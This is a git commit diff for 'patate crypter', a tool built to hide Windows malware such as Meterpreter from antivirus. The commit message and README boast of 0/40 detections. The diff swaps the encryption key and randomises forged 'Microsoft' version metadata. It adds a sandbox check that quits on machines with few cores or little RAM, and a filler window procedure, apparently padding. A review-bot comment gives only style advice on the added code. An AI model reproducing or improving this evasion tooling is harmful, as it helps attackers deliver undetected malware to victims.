fix: now at 0/40 detections back again

This commit is contained in:
2024-03-19 09:02:32 +01:00
parent 1d74de9a6e
commit 4d6b376c03
5 changed files with 30 additions and 14 deletions


@@ -198,7 +198,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
if "/*" in line : in_comment = True if "/*" in line : in_comment = True
elif "*/" in line : in_comment = False elif "*/" in line : in_comment = False
if "switch" in line : in_switch = True if "switch" in line : in_switch = True
elif in_switch and "}" in line : in_switch = False elif in_switch and "}" in line and not "case" in line and not "default" in line : in_switch = False
if "__asm" in line : in_asm = True if "__asm" in line : in_asm = True
elif in_asm and "}" in line : in_asm = False elif in_asm and "}" in line : in_asm = False
if "// Your code here" in line : if "// Your code here" in line :


@@ -1,2 +1,2 @@
#pragma once #pragma once
#define KEY "ouhuoqhzdb" #define KEY "mkhjqsdhfjbzqfcqzf"


@@ -207,6 +207,24 @@ void allo() {
//END //END
} }
LRESULT CALLBACK WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam) {
//START
switch (uMsg) {
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case WM_PAINT: {
PAINTSTRUCT ps;
HDC hdc = BeginPaint(hwnd, &ps);
FillRect(hdc, &ps.rcPaint, (HBRUSH) (COLOR_WINDOW + 1));
EndPaint(hwnd, &ps);
return 0;
} default:
return DefWindowProc(hwnd, uMsg, wParam, lParam);
}
//END
}
#ifdef _DEBUG #ifdef _DEBUG
int main(void) int main(void)
#else #else
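Review bot: `FillRect(hdc, &ps.rcPaint, (HBRUSH) (COLOR_WINDOW + 1));` in the new WindowProc uses a C-style cast, while the same file already uses `static_cast<double>` a few lines later in WinMain; for consistency spell it as a named cast, e.g. `FillRect(hdc, &ps.rcPaint, reinterpret_cast<HBRUSH>(static_cast<INT_PTR>(COLOR_WINDOW + 1)));`. The added function also carries no header comment; a one-liner such as `// Window procedure: handles WM_DESTROY and WM_PAINT, all other messages go to DefWindowProc` above the signature would document its contract. Nothing in this hunk registers WindowProc with a window class, so whether it is referenced at all cannot be confirmed from here.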
@@ -220,20 +238,20 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm
DEBUG_PRINTF("[+] Started\n"); DEBUG_PRINTF("[+] Started\n");
MEMORYSTATUSEX memoryStatus; MEMORYSTATUSEX memoryStatus = { 0 };
memoryStatus.dwLength = sizeof(memoryStatus); memoryStatus.dwLength = sizeof(memoryStatus);
GlobalMemoryStatusEx(&memoryStatus); GlobalMemoryStatusEx(&memoryStatus);
ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys; ULONGLONG totalPhysicalMemory = memoryStatus.ullTotalPhys;
// Convert total physical memory to gigabytes
double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024); double totalPhysicalMemoryGB = static_cast<double>(totalPhysicalMemory) / (1024 * 1024 * 1024);
// Get the number of processor cores
SYSTEM_INFO systemInfo; SYSTEM_INFO systemInfo;
GetSystemInfo(&systemInfo); GetSystemInfo(&systemInfo);
DWORD numProcessorCores = systemInfo.dwNumberOfProcessors; DWORD numProcessorCores = systemInfo.dwNumberOfProcessors;
if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) if (numProcessorCores < 2 || (int)totalPhysicalMemoryGB < 4) {
MessageBoxA(NULL, "uwu", "failed", 0);
return 0; return 0;
}
const int bufferSize = sizeof(sample) / sizeof(sample[0]); const int bufferSize = sizeof(sample) / sizeof(sample[0]);


@@ -68,12 +68,12 @@ BEGIN
BLOCK "040c04b0" BLOCK "040c04b0"
BEGIN BEGIN
VALUE "CompanyName", "Microsoft" VALUE "CompanyName", "Microsoft"
VALUE "FileDescription", "qgfozummtzttkchjglkz" VALUE "FileDescription", "clgdknugqsthezarlwbq"
VALUE "FileVersion", "1.0.0.1" VALUE "FileVersion", "1.0.0.1"
VALUE "InternalName", "oiablyy.exe" VALUE "InternalName", "yhoqres.exe"
VALUE "LegalCopyright", "Copyright (C) 2023" VALUE "LegalCopyright", "Copyright (C) 2023"
VALUE "OriginalFilename", "tmzponf.exe" VALUE "OriginalFilename", "erbggay.exe"
VALUE "ProductName", "oeozjqg.exe" VALUE "ProductName", "awwmoqx.exe"
VALUE "ProductVersion", "1.0.0.1" VALUE "ProductVersion", "1.0.0.1"
END END
END END


@@ -5,15 +5,13 @@ I will not provide any support for running the program, it is only made for peop
# Limitations # Limitations
patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br> patate crypter officially supports 32bit DLLs and PEs. It might be possible to add x64 bit support without too much issues, but i never tried, maybe one day.<br>
The crypter will link the library dynamically by default because statically linking the MSVC default librairies cuases the detections to go from 0/40 to 5/40 (see below).<br>
There is an issue where the reallocations would fail for specific payloads, TOFIX.<br> There is an issue where the reallocations would fail for specific payloads, TOFIX.<br>
There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)). There is code in the `metadata.py` file to generate random BMP images in the metadata of the PE but it makes the entropy go way to high (from 6.4 to 7.4) (see [link](https://practicalsecurityanalytics.com/file-entropy/)).
# Detection rate # Detection rate
There is currently 0/40 detections for a crypted meterperter : There is currently 0/40 detections for a crypted meterperter :
- [original](https://kleenscan.com/scan_result/c6ee0a65f7b88ff709b003357ba9e21a2c1488ad7c6f2314d00bdae45d542df8) - [original meterpreter](https://www.kleenscan.com/scan_result/6ea55d54a947393082f524215c28185ef90a7ec9cb9c50f25c555715b61b0e3e)
- [crypted (dynamically linked)](https://kleenscan.com/scan_result/be8a5e779c0269d2a87d9345118e180162852c4ed70e18f17838da8f879e87ae) - [crypted](https://www.kleenscan.com/scan_result/697277eeddc7cf01ffc81430e3c549488e3a96970edb9ec8d96860d9135eac54)
- [crypted (statically linked)](https://kleenscan.com/scan_result/0b65052a51ce5d3f7807fdae4c7ffc1c45f2868ab41f9073c3bd479b2c86b2a8)
# How does it work ? # How does it work ?
The crypter (compile time) works by : The crypter (compile time) works by :